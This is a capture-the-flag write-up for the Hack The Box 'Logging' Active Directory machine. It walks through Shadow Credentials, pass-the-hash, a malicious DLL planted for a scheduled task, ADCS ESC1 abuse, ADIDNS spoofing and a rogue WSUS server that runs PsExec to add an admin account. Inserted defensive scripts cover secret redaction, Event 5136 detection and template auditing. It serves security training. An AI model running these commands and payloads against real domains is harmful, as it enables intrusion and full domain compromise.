HTB Logging: Credential Exposure → Shadow Credentials → DLL Injection → WSUS Poisoning
Non-retired HTB box. Enter the password to read the writeup.
Introduction
Logging is a Medium-rated Active Directory machine that chains five distinct attack techniques: credential exposure in SMB shares, password pattern inference, Shadow Credentials on a gMSA via GenericWrite ACL, DLL injection through a scheduled task, and WSUS poisoning via rogue HTTPS server.
Attack Overview
[START] wallace.everette / Welcome2026@ (provided)
│
├─[SMB]─► Logs share → IdentitySync_Trace.log
│ BindUser: svc_recovery
│ BindPass: Em3rg3ncyPa$$2025 (old)
│
├─[Pattern]─► Em3rg3ncyPa$$2026 (year rotation)
│ Confirmed via Kerberos clock skew
│
├─[BloodHound]─► svc_recovery ──GenericWrite──► MSA_HEALTH$ (gMSA)
│ MSA_HEALTH$ ──memberOf──► Remote Management Users
│
├─[Shadow Credentials]─► Inject RSA key in msDS-KeyCredentialLink
│ PKINIT auth → NT hash
│
├─[WinRM PtH]─► Shell as MSA_HEALTH$
│
├─[UpdateMonitor]─► DLL injection → runs as jaylee.clifton → user.txt
│ + certreq -submit → UpdateSrv cert for wsus.logging.htb
│
├─[ADIDNS]─► wsus.logging.htb → attacker IP
│
├─[WSUS Poisoning]─► pywsus + stunnel (HTTPS:8531)
│ Fake update → PsExec64 /s → SYSTEM
│
└─[SYSTEM]─► new admin user → WinRM → root.txt
Reconnaissance & Nmap
Add the domain to /etc/hosts:
echo "10.129.245.130 logging.htb" | sudo tee -a /etc/hosts
export IP=10.129.245.130
Full Nmap scan reveals key ports:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Active Directory DNS |
| 80 | HTTP | IIS 10.0 default page |
| 88 | Kerberos | Domain Controller |
| 389/636 | LDAP | AD LDAP |
| 445 | SMB | Windows file sharing |
| 5985 | WinRM | Remote management |
| 8530 | HTTP | WSUS |
| 8531 | HTTPS | WSUS over SSL |
Initial credentials provided: wallace.everette / Welcome2026@
SMB Enumeration – Credential Exposure
List SMB shares:
smbclient -L //10.129.245.130 -U 'wallace.everette%Welcome2026@'
Interesting share: Logs. Connect and download:
smbclient //10.129.245.130/Logs -U 'wallace.everette%Welcome2026@'
smb: \> get IdentitySync_Trace_20260219.log
Search for sensitive data:
grep -iE "password|passwd|credential|secret|token|bind" IdentitySync_Trace_20260219.log
Output:
{ Domain: "logging.htb", Server: "DC01", BindUser: "LOGGING\svc_recovery",
BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }
Credentials obtained (expired): svc_recovery:Em3rg3ncyPa$$2025
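Added example, not part of the original writeup: a small secret scanner and redactor of the kind a defender would run over application logs before they reach a shared location. The sample lines are constructed to mirror the IdentitySync trace entry above (the key names and the `BindPass` value are modelled on it); the key list in `SECRET_KV` is this script's own and should be extended to match local naming conventions.

```python
import re

# Constructed sample lines modelled on the IdentitySync trace entry above (not the real file).
SAMPLE_LOG = """\
2026-02-19 03:14:07 INFO  IdentitySync starting, config loaded
2026-02-19 03:14:07 DEBUG { Domain: "logging.htb", Server: "DC01", BindUser: "LOGGING\\svc_recovery", BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }
2026-02-19 03:14:08 INFO  LDAP bind OK, 412 objects enumerated
2026-02-19 03:14:09 DEBUG token=eyJhbGciOiJIUzI1NiJ9.e30.abc123
"""

# key <sep> value, where the key names a secret; the value may be double-quoted,
# single-quoted, or bare (terminated by whitespace, comma, semicolon or a closing brace).
SECRET_KV = re.compile(
    r"(?P<key>\b(?:bindpass|password|passwd|pwd|secret|token|api[_-]?key)\b)"
    r"(?P<sep>\s*[:=]\s*)"
    r"""(?P<val>"[^"]*"|'[^']*'|[^\s,;}]+)""",
    re.IGNORECASE,
)


def find_secrets(text):
    """Return (line_number, key, value) for every secret-looking assignment in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SECRET_KV.finditer(line):
            hits.append((lineno, m.group("key"), m.group("val").strip("\"'")))
    return hits


def redact(text):
    """Replace each secret value with a marker; the key stays so the log remains readable."""
    return SECRET_KV.sub(lambda m: f'{m.group("key")}{m.group("sep")}"[REDACTED]"', text)


if __name__ == "__main__":
    for lineno, key, value in find_secrets(SAMPLE_LOG):
        print(f"line {lineno}: {key} = {value[:4]}... ({len(value)} chars)")
    print(redact(SAMPLE_LOG))
```

Run it as a pre-ship filter on the log pipeline (or as a CI check on log samples); the point is that a `BindPass` value written by a debug-level trace should never survive to a share readable by regular users.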
Password Pattern Inference
The password follows a pattern: Em3rg3ncyPa$$YYYY. The likely current password is Em3rg3ncyPa$$2026.
Test via Kerberos (Protected Users blocks NTLM):
nxc smb 10.129.245.130 -u 'svc_recovery' -p 'Em3rg3ncyPa$$2026' --kerberos
The error KRB_AP_ERR_SKEW (clock skew) indicates the password is correct but time is out of sync. Synchronize time or use faketime:
faketime '2026-06-05 03:00:00' nxc smb 10.129.245.130 -u 'svc_recovery' \
-p 'Em3rg3ncyPa$$2026' --kerberos
Output: [+] logging.htb\svc_recovery:Em3rg3ncyPa$$2026
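Added example, not from the writeup: the check a password-change filter or rotation job would apply so that a "new" password that is the old one with the year bumped is rejected. It normalises digit runs to a template and also falls back to an edit-distance threshold; the threshold of 3 and the sample passwords are this script's own choices.

```python
import re

DIGIT_RUN = re.compile(r"\d+")


def rotation_template(password):
    """Replace each run of digits with '#', so 'Em3rg3ncyPa$$2025' -> 'Em#rg#ncyPa$$#'."""
    return DIGIT_RUN.sub("#", password)


def edit_distance(a, b):
    """Levenshtein distance (insert/delete/substitute), two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_predictable_rotation(old, new, max_edits=3):
    """Return (flagged, reason). Flags a new password derived from the old one by changing
    only digits (year rotation) or only a few characters."""
    if old == new:
        return True, "unchanged"
    if rotation_template(old) == rotation_template(new):
        return True, "same template, only digits rotated"
    if edit_distance(old, new) <= max_edits:
        return True, f"within {max_edits} edits of the previous password"
    return False, "ok"


def violates_history(new, history, max_edits=3):
    """First previous password the candidate is derived from, or None."""
    for old in history:
        flagged, _ = is_predictable_rotation(old, new, max_edits)
        if flagged:
            return old
    return None


if __name__ == "__main__":
    # Constructed values based on the pattern found in the log above.
    print(is_predictable_rotation("Em3rg3ncyPa$$2025", "Em3rg3ncyPa$$2026"))
    print(is_predictable_rotation("Em3rg3ncyPa$$2025", "Tq7!vLp2#zRw9eHm"))
```

Protected Users membership stopped NTLM but did nothing for a secret whose next value could be read off the previous one; this check is what makes the "random passwords; password manager" remediation from the takeaways enforceable rather than advisory.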
LDAP & BloodHound
Enumerate users and groups:
nxc ldap 10.129.245.130 -u 'wallace.everette' -p 'Welcome2026@' --users --groups
Notable groups:
- Emergency Recovery → member: svc_recovery
- IT → member: jaylee.clifton
- Domain Admins → members: toby.brynleigh, Administrator
- Remote Management Users → member: MSA_HEALTH$
BloodHound reveals the critical path:
- svc_recovery has GenericWrite over MSA_HEALTH$
- MSA_HEALTH$ is a member of Remote Management Users → WinRM access
Shadow Credentials Attack on MSA_HEALTH$
GenericWrite allows writing to the msDS-KeyCredentialLink attribute. Inject a public key to authenticate via PKINIT.
Using pywhisker:
python3 pywhisker.py -d "logging.htb" -u "svc_recovery" -p "Em3rg3ncyPa$$2026" \
--target "MSA_HEALTH$" --action "add" --filename msa_health --password "P@ssw0rd123!"
Output: msa_health.pfx generated.
Extract NT hash using PKINIT:
python3 gettgtpkinit.py -cert-pfx msa_health.pfx -pfx-pass "P@ssw0rd123!" \
logging.htb/MSA_HEALTH$ msa_health.ccache
python3 getnthash.py -key <AS-REP enc key> logging.htb/MSA_HEALTH$
NT hash: 603fc24ee01a9409f83c9d1d701485c5
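Added example, not from the writeup: the Event ID 5136 rule that would have caught the step above. It parses 5136 records (Directory Service object modified, which needs the "Audit Directory Service Changes" subcategory and a SACL on the objects) and alerts when `msDS-KeyCredentialLink` gains a value from a principal that is neither the object itself nor an allow-listed writer. The events are constructed in the Windows event XML layout with an abbreviated `EventData`; the `%%14674` operation code is the standard "Value Added" code for this event. The allow-list argument is where a legitimate writer such as an Azure AD Connect account would go.

```python
import xml.etree.ElementTree as ET

EVENT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
VALUE_ADDED = "%%14674"   # OperationType "Value Added" in Event ID 5136


def _event(subject, domain, object_dn, object_class, attribute, op=VALUE_ADDED):
    """Minimal 5136 record in Windows event XML (constructed sample data)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID><Computer>DC01.logging.htb</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">{subject}</Data>
    <Data Name="SubjectDomainName">{domain}</Data>
    <Data Name="ObjectDN">{object_dn}</Data>
    <Data Name="ObjectClass">{object_class}</Data>
    <Data Name="AttributeLDAPDisplayName">{attribute}</Data>
    <Data Name="OperationType">{op}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    # A service account writes a key onto a gMSA it does not own: the pattern from this box.
    _event("svc_recovery", "LOGGING", "CN=MSA_HEALTH,CN=Managed Service Accounts,DC=logging,DC=htb",
           "msDS-GroupManagedServiceAccount", "msDS-KeyCredentialLink"),
    # A workstation registering its own key (device registration / Windows Hello): expected.
    _event("WS01$", "LOGGING", "CN=WS01,CN=Computers,DC=logging,DC=htb",
           "computer", "msDS-KeyCredentialLink"),
    # Unrelated attribute change on the same object: ignored by this rule.
    _event("toby.brynleigh", "LOGGING", "CN=MSA_HEALTH,CN=Managed Service Accounts,DC=logging,DC=htb",
           "msDS-GroupManagedServiceAccount", "description"),
]


def event_fields(xml_text):
    """Flatten the EventData <Data Name=...> elements into a dict, plus the EventID."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.iter(EVENT_NS + "Data")}
    fields["EventID"] = root.findtext(f"{EVENT_NS}System/{EVENT_NS}EventID")
    return fields


def rdn_name(dn):
    """First RDN value of a DN: 'CN=MSA_HEALTH,...' -> 'MSA_HEALTH'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def key_credential_alerts(events, allowed_writers=frozenset()):
    """Alert on msDS-KeyCredentialLink additions made by someone other than the object itself."""
    allowed = {a.lower() for a in allowed_writers}
    alerts = []
    for xml_text in events:
        f = event_fields(xml_text)
        if f.get("EventID") != "5136" or f.get("AttributeLDAPDisplayName") != "msDS-KeyCredentialLink":
            continue
        if f.get("OperationType") != VALUE_ADDED:
            continue
        subject = f["SubjectUserName"]
        target = rdn_name(f["ObjectDN"])
        if subject.rstrip("$").lower() == target.rstrip("$").lower():
            continue   # self-registration of a key is the normal case
        if subject.lower() in allowed:
            continue
        alerts.append({
            "subject": f"{f['SubjectDomainName']}\\{subject}",
            "target": f["ObjectDN"],
            "object_class": f["ObjectClass"],
            "reason": "msDS-KeyCredentialLink added by a principal other than the object itself",
        })
    return alerts


if __name__ == "__main__":
    for a in key_credential_alerts(SAMPLE_EVENTS):
        print(a)
```

A write by a non-self, non-allow-listed principal onto a gMSA or a computer account is rare enough in most domains that this can page directly; pair it with a periodic sweep that lists every object whose `msDS-KeyCredentialLink` is populated.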
WinRM Foothold as MSA_HEALTH$
Pass-the-Hash to connect via Evil-WinRM:
evil-winrm -i 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5'
DLL Injection via UpdateMonitor
Discovery:
- Scheduled task UpdateChecker Agent runs every 3 minutes as jaylee.clifton.
- The binary C:\Program Files\UpdateMonitor\UpdateMonitor.exe looks for C:\ProgramData\UpdateMonitor\Settings_Update.zip.
- It extracts settings_update.dll and calls PreUpdateCheck.
Permissions:
- MSA_HEALTH$ can write to C:\ProgramData\UpdateMonitor.
- jaylee.clifton has full control over C:\Program Files\UpdateMonitor.
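Added example, not from the writeup: an audit of the directories a scheduled task loads code from, parsing `icacls` output and flagging every non-admin principal with a write-capable right. The `icacls` text below is constructed to match the permissions just listed; the set of rights treated as "write" and the trusted-writer list are this script's own (extend them for your environment). The useful signal is `cross_principal`: a writer that is not the task's own identity can plant files the task will load.

```python
import re

# Constructed icacls output for the two directories named above, in the format icacls
# prints: the path on the first line, then one ACE per line as principal:(flags)(rights).
ICACLS_SAMPLE = {
    r"C:\ProgramData\UpdateMonitor": r"""C:\ProgramData\UpdateMonitor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                             BUILTIN\Administrators:(OI)(CI)(F)
                             LOGGING\MSA_HEALTH$:(OI)(CI)(M)
                             BUILTIN\Users:(OI)(CI)(RX)""",
    r"C:\Program Files\UpdateMonitor": r"""C:\Program Files\UpdateMonitor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                BUILTIN\Administrators:(OI)(CI)(F)
                                LOGGING\jaylee.clifton:(OI)(CI)(F)
                                BUILTIN\Users:(OI)(CI)(RX)""",
}

# icacls right tokens that let a principal create, replace or delete files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "DC", "WDAC", "WO"}
# Principals expected to hold write access on an application directory.
TRUSTED_WRITERS = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "NT SERVICE\\TrustedInstaller"}
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Return [(principal, {right tokens})] for each ACE icacls printed for `path`."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path + " "):          # first line carries the path itself
            line = line[len(path) + 1:].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            tokens.update(t.strip() for t in group.split(","))
        aces.append((m.group("who"), tokens))
    return aces


def audit_task_load_path(task_principal, icacls_by_path):
    """Flag every non-admin principal that can write into a directory the task loads code from.
    cross_principal=True means an identity other than the task's own can plant files there."""
    findings = []
    for path, output in icacls_by_path.items():
        for who, tokens in parse_icacls(path, output):
            granted = tokens & WRITE_RIGHTS
            if who in TRUSTED_WRITERS or not granted:
                continue
            findings.append({
                "path": path,
                "principal": who,
                "rights": sorted(granted),
                "cross_principal": who.lower() != task_principal.lower(),
            })
    return findings


if __name__ == "__main__":
    for f in audit_task_load_path("LOGGING\\jaylee.clifton", ICACLS_SAMPLE):
        print(f)
```

On this box the first finding (MSA_HEALTH$ with Modify on C:\ProgramData\UpdateMonitor while the task runs as jaylee.clifton) is the whole escalation; the second (the task owner able to replace its own binary) is the weaker "task should not be able to rewrite itself" case.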
Craft a 32-bit DLL (the binary is 32-bit):
// settings_update.c
#include <windows.h>
#include <stdlib.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
return TRUE;
}
__declspec(dllexport) void PreUpdateCheck() {
system("cmd.exe /c type C:\\Users\\jaylee.clifton\\Desktop\\user.txt "
"> C:\\ProgramData\\UpdateMonitor\\Logs\\out.txt");
}
Compile:
i686-w64-mingw32-gcc -shared -o settings_update.dll settings_update.c -static
zip -j Settings_Update.zip settings_update.dll
Upload via WinRM:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
--put-file Settings_Update.zip 'C:\ProgramData\UpdateMonitor\Settings_Update.zip'
Grant read permissions:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X 'icacls "C:\ProgramData\UpdateMonitor\Settings_Update.zip" /grant "Everyone:(R)"'
Wait up to 3 minutes. Retrieve output:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X 'type C:\ProgramData\UpdateMonitor\Logs\out.txt'
User flag:
[redacted]
WSUS Poisoning – Privilege Escalation to SYSTEM
From jaylee.clifton’s documents, a file Incident_4922_WSUS_Remediation_ViewExport.html reveals:
- DC01 pulls updates from wsus.logging.htb (HTTPS port 8531)
- DNS record for wsus.logging.htb is missing (NXDOMAIN)
- A scheduled task ForceSync restarts wuauserv every 120 seconds
Step 1 – ADIDNS Spoofing
By default, any authenticated domain user can create new records in an AD-integrated DNS zone. Add wsus.logging.htb pointing to the attacker IP:
python3 dnstool.py -u 'logging.htb\wallace.everette' -p 'Welcome2026@' \
-r wsus.logging.htb -d 10.10.14.191 --action add 10.129.245.130
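Added example, not from the writeup: the configuration check a defender would run against the Windows Update client policy to catch the two conditions this step depends on, a WSUS name with no DNS record (a dangling name that any authenticated user can claim) and a name that resolves somewhere other than the known WSUS server. The resolver is a dict standing in for DNS lookups (`None` meaning NXDOMAIN), and the expected server address and internal ranges are constructed values. HTTPS by itself did not save DC01 here, since a valid certificate was obtained from the enterprise CA, so the DNS checks carry the weight.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed: the known-good WSUS server and the address ranges it is allowed to live in.
EXPECTED_WSUS = {"wsus.logging.htb": "10.129.245.130"}
INTERNAL_NETS = [ipaddress.ip_network("10.129.0.0/16")]


def check_wsus_config(wu_server_url, resolver, expected=EXPECTED_WSUS, internal=INTERNAL_NETS):
    """Return a list of findings for the WUServer policy value; empty means it looks sane.

    resolver: dict host -> IP string, or missing/None for NXDOMAIN (stands in for a DNS query)."""
    findings = []
    u = urlsplit(wu_server_url)
    host = (u.hostname or "").lower()
    if u.scheme != "https":
        findings.append("WUServer is not HTTPS: update metadata and payloads can be altered in transit")
    if host not in expected:
        findings.append(f"{host} is not a known WSUS server name")
    ip = resolver.get(host)
    if ip is None:
        findings.append(f"{host} has no DNS record: a dangling name that an authenticated user could register in ADIDNS")
        return findings
    if host in expected and ip != expected[host]:
        findings.append(f"{host} resolves to {ip}, expected {expected[host]}")
    if not any(ipaddress.ip_address(ip) in net for net in internal):
        findings.append(f"{ip} is outside the internal address ranges")
    return findings


if __name__ == "__main__":
    url = "https://wsus.logging.htb:8531"
    print("dangling:", check_wsus_config(url, {}))
    print("hijacked:", check_wsus_config(url, {"wsus.logging.htb": "10.10.14.191"}))
    print("healthy: ", check_wsus_config(url, {"wsus.logging.htb": "10.129.245.130"}))
```

Run this on a schedule from a monitoring host and alert on any non-empty result; the dangling-name case is the one to fix first, because once the record exists it is owned by whoever created it.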
Step 2 – ADCS Certificate for wsus.logging.htb (ESC1)
The UpdateSrv certificate template allows enrollee-supplied SAN and server authentication EKU. jaylee.clifton is in the IT group and can enroll.
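Added example, not from the writeup: a template auditor that applies the ESC1 conditions to certificate template records. The flag bits are the documented values of `msPKI-Certificate-Name-Flag` (enrollee supplies subject) and `msPKI-Enrollment-Flag` (manager approval), and the EKU OIDs are standard; the template records and their field names are constructed for this script, not LDAP attribute names. One detail this box makes visible: a group like IT is not in any default "low-privilege" list, so the auditor takes the set of groups considered broad as an argument and the UpdateSrv finding only appears once IT is included.

```python
# Bits from the msPKI-* template attributes (values as documented by Microsoft).
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag: requester chooses subject/SAN
PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: CA manager approval required
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {EKU_SERVER_AUTH, EKU_CLIENT_AUTH, EKU_ANY_PURPOSE}
DEFAULT_BROAD_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed template records (field names are this script's own, not LDAP attribute names).
SAMPLE_TEMPLATES = [
    {"name": "UpdateSrv", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": [EKU_SERVER_AUTH], "enroll": ["IT"]},
    {"name": "WebServer", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": [EKU_SERVER_AUTH], "enroll": ["Domain Admins"]},
    {"name": "User", "published": True, "name_flag": 0x0, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": [EKU_CLIENT_AUTH], "enroll": ["Domain Users"]},
    {"name": "ApprovedServer", "published": True, "name_flag": 0x1, "enrollment_flag": 0x2,
     "ra_signatures": 0, "ekus": [EKU_SERVER_AUTH], "enroll": ["Domain Users"]},
    {"name": "Workstation", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": [EKU_CLIENT_AUTH], "enroll": ["Domain Computers"]},
    {"name": "OldSrv", "published": False, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": [EKU_SERVER_AUTH], "enroll": ["Domain Users"]},
]


def esc1_findings(templates, broad_groups=DEFAULT_BROAD_GROUPS):
    """Templates where a broad group can obtain an authentication certificate with a chosen SAN."""
    findings = []
    for t in templates:
        if not t["published"]:
            continue                     # not offered by any CA
        if not t["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT:
            continue                     # subject/SAN is built from AD, not requester-supplied
        if t["enrollment_flag"] & PEND_ALL_REQUESTS or t["ra_signatures"] > 0:
            continue                     # a human approval or a second signature gates issuance
        ekus = set(t["ekus"])
        if ekus and not ekus & AUTH_EKUS:
            continue                     # certificate cannot be used to authenticate
        broad = [g for g in t["enroll"] if g in broad_groups]
        if not broad:
            continue
        impact = []
        if not ekus or EKU_ANY_PURPOSE in ekus or EKU_CLIENT_AUTH in ekus:
            impact.append("any user can be impersonated (client auth)")
        if not ekus or EKU_ANY_PURPOSE in ekus or EKU_SERVER_AUTH in ekus:
            impact.append("any server name can be impersonated (server auth)")
        findings.append({"template": t["name"], "enrollable_by": broad, "impact": impact})
    return findings


if __name__ == "__main__":
    print("default groups:", esc1_findings(SAMPLE_TEMPLATES))
    print("with IT:       ", esc1_findings(SAMPLE_TEMPLATES, DEFAULT_BROAD_GROUPS | {"IT"}))
```

The server-auth variant is easy to overlook in an ESC1 review that only looks for client authentication; here it is exactly what let a requester obtain a certificate for wsus.logging.htb, so the fix is to clear "Enrollee Supplies Subject" on UpdateSrv or restrict its enrollment rights to the host owners.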
Generate a key pair and CSR for wsus.logging.htb:
openssl genrsa -out wsus_kali.key 2048
openssl req -new -key wsus_kali.key -out wsus_kali.csr \
-subj "/CN=wsus.logging.htb" \
-addext "subjectAltName=DNS:wsus.logging.htb" \
-addext "extendedKeyUsage=serverAuth"
Upload the CSR via WinRM (as MSA_HEALTH$), then use a DLL payload running as jaylee.clifton to submit it to the CA:
# Upload CSR
CSR_B64=$(base64 -w 0 wsus_kali.csr)
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X "[IO.File]::WriteAllBytes('C:\\ProgramData\\UpdateMonitor\\wsus_kali.csr', \
[Convert]::FromBase64String('$CSR_B64'))"
The DLL payload (submitted via the same UpdateMonitor mechanism) runs:
system("cmd.exe /c certreq -submit "
"-config \"DC01.logging.htb\\logging-DC01-CA\" "
"-attrib \"CertificateTemplate:UpdateSrv\" "
"C:\\ProgramData\\UpdateMonitor\\wsus_kali.csr "
"C:\\ProgramData\\UpdateMonitor\\wsus_kali.cer "
"> C:\\ProgramData\\UpdateMonitor\\Logs\\cert.txt 2>&1");
Retrieve the signed certificate:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
--get-file 'C:\ProgramData\UpdateMonitor\wsus_kali.cer' wsus_kali.cer
Step 3 – Rogue WSUS Server
Use pywsus with stunnel to serve a malicious update over HTTPS.
Prepare stunnel.conf:
[wsus]
accept = 8531
connect = 127.0.0.1:8530
cert = wsus_stunnel.pem
key = wsus_kali.key
Combine certificate and key for stunnel:
cat wsus_kali.cer wsus_kali.key > wsus_stunnel.pem
Start pywsus (HTTP on 8530) and stunnel:
python3 pywsus.py -H 0.0.0.0 -p 8530 \
-e PsExec64.exe \
-c '/accepteula /s cmd.exe /c "net user rooter R00t3r2026! /add && \
net localgroup Administrators rooter /add && \
net localgroup \"Remote Management Users\" rooter /add"' \
--log-file /tmp/pywsus.log &
stunnel4 /tmp/stunnel.conf &
Trigger the DC to check for updates via WinRM shell:
wuauclt /detectnow
wuauclt /updatenow
The DC sends a request to the rogue WSUS server, downloads PsExec64.exe, and executes it as SYSTEM. A new user rooter is created.
Connect as rooter:
evil-winrm -i 10.129.245.130 -u 'rooter' -p 'R00t3r2026!'
Root flag:
type C:\Users\toby.brynleigh\Desktop\root.txt
[redacted]
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| Credentials in log files | Verbose logging of LDAP bind credentials | Never log secrets; use secrets managers |
| Overly permissive SMB share | Logs share readable by low-privileged users | Apply least-privilege access controls |
| GenericWrite on gMSA | Excessive ACL permissions | Audit BloodHound regularly; monitor Event ID 5136 |
| Predictable password rotation | Year suffix pattern negates Protected Users benefit | Use random passwords; password manager |
| DLL injection via scheduled task | BUILTIN\Users write access to directory where executable loads DLLs | Restrict write permissions; use WDAC/AppLocker |
| ADIDNS spoofing | Default DNS record creation by any authenticated user | Restrict DNS record creation; monitor changes |
| ADCS ESC1 (enrollee-supplied SAN) | Misconfigured certificate template | Disable “Enrollee Supplies Subject” unless required; restrict enrollment rights |
| WSUS over HTTP without DNS validation | Missing DNS record; WSUS not using HTTPS properly | Use HTTPS; secure DNS records; validate WSUS server identity |
Resources
- Nmap — Port scanning
- smbclient — SMB enumeration
- NetExec (nxc) — LDAP, WinRM, SMB automation
- pywhisker — Shadow Credentials attack
- evil-winrm — WinRM shell
- dnstool.py — ADIDNS manipulation
- pywsus — WSUS rogue server
- stunnel — TLS wrapper for HTTP services
- Impacket — gettgtpkinit.py, getnthash.py, PsExec